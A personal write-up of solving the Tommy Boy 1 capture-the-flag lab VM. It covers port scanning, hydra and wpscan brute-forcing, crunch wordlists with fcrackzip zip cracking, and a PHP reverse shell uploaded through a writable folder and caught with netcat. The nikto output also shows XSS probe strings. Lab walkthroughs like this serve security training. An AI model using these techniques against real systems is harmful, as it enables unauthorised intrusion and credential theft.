Tommy Boy 1 CTF VM — Vulnhub.com

Lets just get straight into it, as usual I start with a really simple netdiscover

netdiscover

IP 192.168.1.104

mnap -T4 -A -v 192.168.1.104
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries 
| /6packsofb…soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT

Ok so we have ports open:
22 ssh
80 http
8008 http

Thats a few things to start looking at so lets start at the top with the ssh 22 port

root@kali:~# ssh 192.168.1.104
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:bI4/w4tR6j1XRyuLkIs5icsyLJM0Kfw9m4iPFpXX0NI.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /root/.ssh/known_hosts:7
 remove with:
 ssh-keygen -f “/root/.ssh/known_hosts” -R 192.168.1.104

ECDSA host key for 192.168.1.104 has changed and you have requested strict checking.
Host key verification failed.

Ok, I don't really understand this at the moment but the header from the scan returned something about the ssh key
ssh-hostkey: 
| 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_ 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)

So I think I’m going to have to google a bit and see what it means. Right now it seems like I need to change the host key in /root/.ssh/known_hosts but I havent got root yet :-( ok lets move on to the http ports with firefox and a nikto scan.

firefox 192.168.1.136 (eagle eyed among you might see that the IP has changed — I’ve switched from wifi dongle to home wifi network)

so nothing immediate jumps off the page, lets look at the source code for it.

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color=”FF3339"><H2>SYSTEM ERROR!</H2></font>
If your’e reading this, the Callahan Auto customer ordering system is down. Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<! — Comment from Nick: backup copy is in Big Tom’s home folder →
<! — Comment from Richard: can you give me access too? Big Tom’s the only one w/password →
<! — Comment from Nick: Yeah yeah, my processor can only handle one command at a time →
<! — Comment from Richard: please, I’ll ask nicely →
<! — Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog →
<! — Comment from Richard: Deal. Where’s the blog again? →
<! — Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It’s here if you don’t remember:
https://www.youtube.com/watch?v=VUxOd4CszJ8--
<! — Comment from Richard: Ah! How could I forget? Thanks →

Cool, first clue!!! Lets see what that youtube video link is and see if we can start to guess the what the clue means.

I'm going to go with Prehistoric Forrest or some combination of these. 
(added to my working notes for now)

The Nikto scan returned so much info, I’ve never seen a scan return so much. Here’s just a dump of it and then I’ll go back through it and look for more relevant entries:

root@kali:~# nikto -host 192.168.1.136
- Nikto v2.1.6
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 192.168.1.136
+ Target Hostname: 192.168.1.136
+ Target Port: 80
+ Start Time: 2016–07–30 08:31:18 (GMT-4)
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x498 0x5371fb88ff1d8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /webcgi/: Directory indexing found.
+ OSVDB-3268: /cgi/: Directory indexing found.
+ OSVDB-3268: /cgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-sys/: Directory indexing found.
+ OSVDB-3268: /cgibin/: Directory indexing found.
+ OSVDB-3268: /cgi-win/: Directory indexing found.
+ OSVDB-3268: /fcgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-exe/: Directory indexing found.
+ Entry ‘/6packsofb…soda’ in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry ‘/lukeiamyourfather/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry ‘/lookalivelowbridge/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/flag-numero-uno.txt’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ OSVDB-3268: /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ OSVDB-3268: /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>: Directory indexing found.
+ OSVDB-3268: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: Directory indexing found.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-3268: /ariadne/: Directory indexing found.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ OSVDB-3268: /manager/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3268: /web/: Directory indexing found.
+ OSVDB-3268: /publisher/: Directory indexing found.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-3268: /photo/: Directory indexing found.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.

(ABOUT ANPOTHER 150 LINES OF OSVDB ENTRIES WERE ALSO LISTED BUT I DELETED THEM TO SAVE YOU HAVING TO ENDLESSLY SCROLL THROUGH THEM IN THIS WALKTHROUGH) 
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Ok where the F do I start??…. Somewhere is better than no where. The first thing that got my attention were these entries close to the top.

+ Entry ‘/6packsofb…soda’ in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry ‘/lukeiamyourfather/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry ‘/lookalivelowbridge/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry ‘/flag-numero-uno.txt’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 4 entries which should be manually viewed.

Lets see what each of these 4 entries has on it.

http://192.168.1.136/6packsofb...soda/

The linked file is this
http://192.168.1.136/6packsofb...soda/6packsofsoda.jpg

Nothing really obvious straight away. Lets move on after making a note of the jpg address we’ll take a deeper look in a bit.

192.168.1.136/lukeiamyourfather

Same as before, lets just jump ahead and if we need to I’ll come back and deep dive the images.

http://192.168.1.136/lookalivelowbridge/

The last entry of the robots.txt is the first flag in plain text. 
***** Flag 1 found *****

This is the first of five flags in the Callhan Auto server. You’ll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Carrying on down through the Nikto scan next I saw these entries:

+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.

So lets see if we can get anything from these. No real luck TBH they are all directories but they are essentially blank (which makes sense as reading the description of the box on Vulnhub.com suggests we need to load a backup of the companies website as it’s been deleted)

Interestingly all the pages have this at the bottom of them 
Apache/2.4.18 (Ubuntu) Server at 192.168.1.136 Port 80

So lets see if there are any known expliots for this version of Apache server. Nothing really thats useful at the moment.

Thinking back to the source code notes from above it seems like Nick is the “IT guy” for this box as he’s saying he’ll set up another user as an admin.

So I’m going to use the username nick and run hydra on the ssh port. Fingers crossed it returns something.

root@kali:~# hydra -l nick -P /usr/share/wordlists/rockyou.txt 192.168.1.136 ssh
[DATA] attacking service ssh on port 22

That is going to a long time. I’ll leave it running and come back later.

Whats on the last port that’s open 8008?? 
Its a webpage with the following text on it:

Looking at the source code doesn't offer anything further, ok what does the clue mean?? 
I guess it could mean an ftp server (going on the line “This is only for Nick’s super secret stuff”).

After trying a few FTP commands I couldn't connect!! :-( 
Ok time for a tea break I think. I’ll be back haha I’m completely at a dead end right now.
 
Ok let’s get back to it. The webpage I’m stuck on has this writing on it:

This is only for Nick’s super secret stuff. If you don’t know where to go from here, you’re not sup3rl33t enough.
Leave now!
Only me and Steve Jobs are allowed to look at this stuff.
Lol
-Nick

So I cant see the content because I’m not super leet enough. But Nick seems to think he is. After about 5 hrs and trying so many different versions/combinations of the words Nick, Sup3r, L33t, etc I finally found it NickIzL33t using that as a folder address gets us to another webpage with the text:

It sounds like we need to brute force our way into the fortress lets run Nikto on that new page we’ve just found. Nothing came back.

Ok let’s read through my working notes again, what am I missing?

The company blog has something to do with Prehistoric Forest, lets try and see if we can locate the blog.

192.168.1.136/prehistoricfrest

Holy Frak!!!!! That worked, I’m on the company blog

I’m going to have a look around and see what info I can gather to hopefully move on to the next step.

The first blog post tells us to go to the /richard folder on the server for the password for the second blog pst which is protected.

The /richard folder has a jpg in it called shockedrichard.jpg looking at the picture doesnt seem to give me any clues and neither does the source code. I’m going to download it and have a look at the exif data.

root@kali:~# exiftool -verbose /root/shockedrichard.jpg

LOADS OF THE USUAL EXIF DATA THAT DIDNT REALLY HELP AT ALL BUT THEN I NOTICED THIS LINE. I’VE NOT SEEN THIS BEFORE.

| | 1) UserComment = ASCIIce154b5a8e59c89732bc25d6a2e6b90b

Lets see if we can decode it at all.

Jumping over to crackstation.net deleting the ASCII from the start and running the string through it gives us the word SPANKY.

So lets use that on the second blog post. That didn't seem to work. For some reason when I click any of the blog posts the IP in the address bar changes. from a .136 to .104 ending which gives me a page not found.
 If I manually change it back then I can get to the page, but not the password protected one. Let’s come back to this in a minute. 
Onto the next blog post, most of them are just random posts to each other but the 1st post had a reply to it and in it was an address for the 2nd flag string.

Flag 02 = thisisthesecondflagyayyou.txt

192.168.1.136/prehistoricforest/thisisthesecondflagyayyou.txt gives me the actual flag data.

You’ve got 2 of five flags — keep it up!

Flag data: Z4l1nsky

***** Flag 2 Found *****

Ok I’ve got to figure out a way to enter that password for the protected blog post without it changing the address. TURNS OUT I WAS HAVING ISSUES WITH MY NETWORK ADAPTER IN VMWARE. AFTER A LITTLE MESSING AROUND I GOT IT WORKING AGAIN AND ALL THE VM’S ARE NOW PLAYING NICELY TOGETHER. Thanks to Geckom (Vulnhub IRC) for the help with that.

So its back to the webpage and using the passwd spanky to gain access to the protected blog post.

FINALLY ITS WORKED!!!

I’m on a webpage with the following text:

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can’t find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

You guys are all hopeless sheep :-/
 The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
 IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

Ok so to summeries,

The backup called callahanbak.bak that just needs to be renamed to index.html (you have to use big tom’s account via SSH)

Big Tom’s account is in the userlist (but isnt called bigtom)

Nick’s home foler via FTP, but isnt on the correct port (not sure what port its on at this point). 
The FTP server goes on/off every 15 minutes. On at the top of the hour and then cycles every 15 mins.

Nick’s ftp login = nickburns (not sure the password yet but it’s very easy)

Nick deleted his ssh access but the creds still work.

So its currently 10.29am so I think I’ll run an nmap scan and see if I can pick up the FTP port before it swtiches off again.

kali:~# nmap 192.168.211.133 -p 0–70000
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016–08–01 05:31 EDT
Ports specified must be between 0 and 65535 inclusive
QUITTING!

That’s interesting, ok so lets rerun the scan on the last 100 ports to start with and see if we can find the port.

root@kali:~# nmap 192.168.211.133 -p 65435–65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016–08–01 05:35 EDT
Nmap scan report for 192.168.211.133
Host is up (0.00049s latency).
Not shown: 100 closed ports
PORT STATE SERVICE
65534/tcp open unknown
MAC Address: 00:0C:29:AD:05:01 (VMware)

BINGO!! the scan found the FTP port on 65534. Current time is 10.34am let’s see if we can connect before 10.45

root@kali:~# ftp 192.168.211.133 65534
Connected to 192.168.211.133.
220 Callahan_FTP_Server 1.3.5
Name (192.168.211.133:root): nickburns
331 Password required for nickburns
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r — 1 nickburns nickburns 977 Jul 15 02:37 readme.txt
226 Transfer complete

ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete

ftp> exit

Wow, that was intense. I’ve never really been up against the clock like that before. It was fun. 
Ok so all that seemed to be on there was Nick’s readme.txt file so I downloaded it before the time was up. Lets take a look at it.

root@kali:~# cat /root/readme.txt
To my replacement:

If you’re reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You’ll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn’t know a fax machine
from a flame thrower!

Anyway I’m not completely without mercy. There’s a subfolder called “NickIzL33t” on this server
somewhere. I used it as my personal dropbox on the company’s dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom’s a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the “NickIzL33t” folder as well. But guess what?
He always forgets THAT password as well. Luckily I’m a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

I now 100% know I’ve attacked this VM the wrong way round. I found that NickIzL33t folder before, when I got stuck and it took me about 5 hrs of banging my head against all the walls to come up with that combination NickIzL33t. 
Ah well lesson learnt I guess. And it did feel SO great when I found that folder on my own. I’m pissed off it took me so long but really proud I found it.

So back to http://192.168.211.133:8008/NickIzL33t and we’re back on the webpage but it’s slightly different this time.

It still says only him and Steve Jobs can see this content but it now says it’s a dropbox. My original idea when I saw the page the first time round was that it needed to be viewed on an apple device. I don't have one to hand to test out the idea so I thought I’d try viewing it in safari. THAT DIDNT WORK!!

After googling for a bit and trying to find out how I could view things whilst appearing as something else. I found a firefox plugin called User Agent Switcher. It comes with a few default user agents already loaded so I just picked the iPhone one and then reloaded the page.

Cool, that took a while but I now understand user agents and how to spoof them. All good things I feel.

The webpage is now this:

So I’m a step closer but not fully there yet. So it seems there folder I’m looking for has a very exact name to it. Let’s see if I can find it with dirbuster. 
Nope, that didnt work. I got a lot of errors though. I think its because I’m not sending the requests with the spoofed UA so lets try wfuzz next and set the UA header.

root@kali:~# wfuzz -c -v -w /usr/share/wordlists/rockyou.txt -H “User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16” — hc 404 http://192.168.211.133:8008/NickIzL33t/FUZZ.html

After a really really long time I eventually got a hit in a folder — fallon1

http://192.168.211.133:8008/NickIzL33t/fallon1.html

So the page is giving us a few bits of info. Lets take a look at them.

hint.txt:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD! 
And because you were choosing stupidiculous passwords like “password123” and “brakepad” I
enforced new password requirements on you…13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife’s nickname “bev” (note it’s all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that’s a lot of keys to push but make sure you type them altogether in one 
big chunk ok? Heh, “big chunk.” A big chunk typing big chunks. That’s funny.

LOL

-Nick

Third flag.txt:
THREE OF 5 FLAGS — you’re awesome sauce.

Flag data: TinyHead

***** Flag 3 found *****

And the last link is the encrypted passwd backups for Big Tom. Clicking the link saves the file as tOmsp4sswOrdz.zip

So I need to figure out how to create a custom dictionary using the hints nick has given us.

It starts with ‘bev’,1 upper case char, 2 numbers, 2 lowercase chars, one symbol and then 1995

bev[A-Z][1–9][1–9][a-z][a-z][symbol]1955

So that’s the string that I need to use but I’m not sure what application to us at the moment. Lets jump over to google.

I found an artical from null-byte that uses an application called crunch here’s a link to the article if you need it.
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/

So I needed to creat a dictionary using crunch, the command I used was

crunch 13 13 -t bev,%%@@^1995 -o tommypasswd.txt

Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800

58 million combinations, fair enough. I was really surprised when it only took about 20 seconds for crunch to complete the task.

So now I’ve got my custom dictionary formatted from Nick’s clues lets use it to brute force Big Tom’s password file. I’ll use fcrackzip

root@kali:~# fcrackzip -v -D -u -p /root/tommypasswd.txt /root/t0msp4ssw0rdz.zip
found file ‘passwords.txt’, (size cp/uc 332/ 641, flags 9, chk 9aad)
checking pw bevG72kn~1995

PASSWORD FOUND!!!!: pw == bevH00tr$1995

Cool, that didnt take as long as I was expecting. So the password is bevH00tr$1995

Lets use that to unzip the passwd text file and see whats in there.

Sandusky Banking Site
 — — — — — — — — — — — — 
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
 — — — — — — — — — — — — — -
Username: TomC
Password: wedding

Callahan Auto Server
 — — — — — — — — — — — — — — 
Username: bigtommysenior
Password: fatguyinalittlecoat1938

Note: after the “fatguyinalittlecoat” part there are some numbers, but I don’t remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
 — — — — — — — — — — — — — — 
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Alright so we have some more info but nothing is 100% complete. I’m still trying to get into BigToms SSH. I know his username and the first part of his password but to find the last part (remaining numbers at the end) I need to get access to the blog as Nick has left himself a draft containing those numbers.

So how to get into the blog?? 
The username is not bigtom. But I remember there was a blog post written by big tom so lets see who the author is and try that as the username.

http://192.168.211.133/prehistoricforest/index.php/author/tom/ this is the URL of the post and we I can see it written by user tom but that the author is in fact big tom

So I’ve got big toms real blog username. Now the password clue is something to do a famous queen song. A rather longer than I really wanted google search gave me an idea.
One of their songs is we will rock you. I have a huge password list called rockyou.txt so lets try the easy option first and head over to the word press blog login screen.

http://192.168.211.133/prehistoricforest/wp-login.php

I know the username is tom and I’ll try the password rockyou

Ok so that didnt work, but interestingly it did confirm that tom was the correct username.

So the next thing I was going to try was run hydra on the wp login screen with the username tom and using the rockyou.txt dictionary. For some reason I couldn’t get the correct syntax to make hydra attack the login page. Not to worry though as I can use wp-scan which is probably going to be a better bet as it’s designed for the job.

so running the command:
root@kali:~# wpscan — url http://192.168.211.133/prehistoricforest/wp-login.php — wordlist /usr/share/wordlists/rockyou.txt — username tom — wp-content-dir /wp-content

Cool after a few minutes wp-scan gives us the password as tomtom1

so back over to firefox and enter the username tom and the password tomtom1.

Cool, I’m in. Lets find the draft folder with the end of the password text in it. There is only one draft

Ok so Nick always yells at me for forgetting the second part of my “ess ess eight (ache? H?) password so I’m writing it here:

1938!!

Nick, if you’re reading this, I DON’T CARE IF I”M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I”LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

That’s it, we now have the username and the two parts of the password for bigtom’s “ess ess eight” login.

Lets put it all together and see what we can find.

root@kali:~# ssh bigtommysenior@192.168.211.133
bigtommysenior@192.168.211.133's password: fatguyinalittlecoat1938!!

Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0–31-generic x86_64)

* Documentation: https://help.ubuntu.com/

150 packages can be updated.
0 updates are security updates.

Last login: Thu Jul 14 13:45:57 2016
bigtommysenior@CallahanAutoSrv01:~$

We’re in, lets have a look around and see what’s there.

bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP

Let’s go straight for the flag text first.

bigtommysenior@CallahanAutoSrv01:~$ cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.
Flag data: EditButton

But…but…where’s flag 5?

I’ll make it easy on you. It’s in the root of this server at /5.txt

***** Flag 5 Found *****

So before we name the backup file and get it all working again, lets go after that 5th flag.

bigtommysenior@CallahanAutoSrv01:~$ pwd
/home/bigtommysenior
 Just so I know where I currently am, but more importantly where the backup file is.

navigate back up to the root directory and list the files (there were loads more in the folder but I’m only interested in the 5.txt file)

bigtommysenior@CallahanAutoSrv01:/$ ls -la
total 105
drwxr-xr-x 25 root root 4096 Jul 15 12:35 .
drwxr-xr-x 25 root root 4096 Jul 15 12:35 ..
-rwxr-x — — 1 www-data www-data 520 Jul 7 15:36 .5.txt

bigtommysenior@CallahanAutoSrv01:/$ cat .5.txt
cat: .5.txt: Permission denied

WTF!!

bigtommysenior@CallahanAutoSrv01:/$ whoami
bigtommysenior

Haha ok, we’re not logged in as the correct user to view the 5.txt file it’s owned by www-data. Ok let’s come back to this in a bit. I’m going to reinstall the back up file.

bigtommysenior@CallahanAutoSrv01:/$ cd home
bigtommysenior@CallahanAutoSrv01:/home$ ls

bigtommysenior nickburns tommy 
(I tried the other 2 profiles but they were locked up tight)
bigtommysenior@CallahanAutoSrv01:/home$ cd bigtommysenior/
bigtommysenior@CallahanAutoSrv01:~$ ls
callahanbak.bak el-flag-numero-quatro.txt LOOT.ZIP

So way back at the beginning of the VM I found out I had to rename the backup file as index and all would be ok.

bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html 
that should have done it, so lets reload the webpage and see.

Awesome, so the main part of the VM is now complete. I’ve restored the website and it’s back up and running again.

So there are just a few things left to do to be able to fully say I’ve completed the VM.

I need to get the 5th flag text and also there was a LOOT.zip file in Big Tom’s ssh account.

Lets jump back in and see if we can tick these off too.

First up lets see what the loot file is. 
It’s password protected!!!! :-(

Lets go after the 5th flag text. It’s own by www-data so I’m thinking I need a web exploit to get access and then cat the file. I need a way to be able to upload my trusty php reverse shell. After a lot of googling I found out I needed to find some writeable dir’s. Lets look for some world writeable directories using the command I found from the google search.

bigtommysenior@CallahanAutoSrv01:/$ find / -perm -2 -type d 2>/dev/null
/var/lib/php/sessions
/var/crash
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads

That looks really interesting. I completely forgot Nick has his own webserver running where he uploads his own supersecret stuff. Lets navigate to that and see what’s going on there and if we can use it.

Ok so lets try and upload our php script (after checking its been modified to the correct IP address this time) I’ll start a listener ready for the script

nc -l -v -p 2007

I tried to upload the php file with the php extension and I got an error saying only image files are allowed. So lets change the extension and try again to get it uploaded.

That worked and the webpage tells me the file has been uploaded to the /uploads folder. I’ll try to launch the script by navigating to the upload location.

I’m such an idiot sometimes, trying to get the upload folder I realised my “script” is now just sitting there as a jpg with error’s on it. 
Ok lets upload it again and this time use tamperdata to intercept it and change the file extension.
That didn't work, what am I doing wrong?? This is infuriating. I think it’s time for a tea break and mental regroup. I’m so close now, but currently getting no where.

That was it, whilst enjoying a new nespresso blend that arrived in the post yesterday, it hit me. 
I already own the server my reverse shell is sitting on. All I’ve got to do is change the file extension from the terminal.

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
index.html php-reverse-shell.jpg

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ mv php-reverse-shell.jpg shell.php

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls
index.html shell.php

Bingo, ok now I’ve still got my netcat listener fired up and waiting lets navigate the shell file in firefox

http://192.168.211.133:8008/NickIzL33t/P4TCH_4D4MS/uploads/shell.php

and switch to the 2nd terminal window with the listener

root@kali:~# nc -l -v -p 2007
listening on [any] 2007 …
192.168.211.133: inverse host lookup failed: Unknown host
connect to [192.168.211.132] from (UNKNOWN) [192.168.211.133] 40526
Linux CallahanAutoSrv01 4.4.0–31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 05:00:14 up 7:53, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bigtommy pts/0 192.168.211.132 03:46 37.00s 1.15s 1.15s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$

 I love that reverse shell script, it’s worked on 4 of these VM’s now.

A quick whoami and a pwd confirms I’m logged in as www-data and I’m in the root dir

$ cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON’T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was “hi” and flag 2 data was “there” and flag 3 data was “you”
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom’s
folder and you can call the box PWNED.
$

Awesome, I’m pretty much there. The flag strings from my working notes are
flag 01 = B34rcl4ws
flag 02 = Z4l1nsky
flag 03 = TinyHead
flag 04 = EditButton
flag 05 = Buttcrack

so the password for the LOOT zip is B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

lets unzip the file and complete the VM

bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password: 
 inflating: THE-END.txt

bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt

YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!
I’d love to know that you finished this VM, and/or get your suggestions on how to make the next 
one better.
Please shoot me a note at 7ms @ 7ms.us with subject line “Here comes the meat wagon!”
Or, get in touch with me other ways:
* Twitter:
@7MinSec
* IRC (Freenode): #vulnhub (username is braimee)
Lastly, please don’t forget to check out
www.7ms.us and subscribe to the podcast at
bit.ly/7minsec
</shamelessplugs>

Thanks and have a blessed week!

  • Brian Johnson
    7 Minute Security

Wow, this has been the most enjoyable VM I’ve done to date, even including the amazing Mr Robot VM. Huge thanks to Brian Johnson for creating it. I think I’m going to watch Tommy Boy now after all this.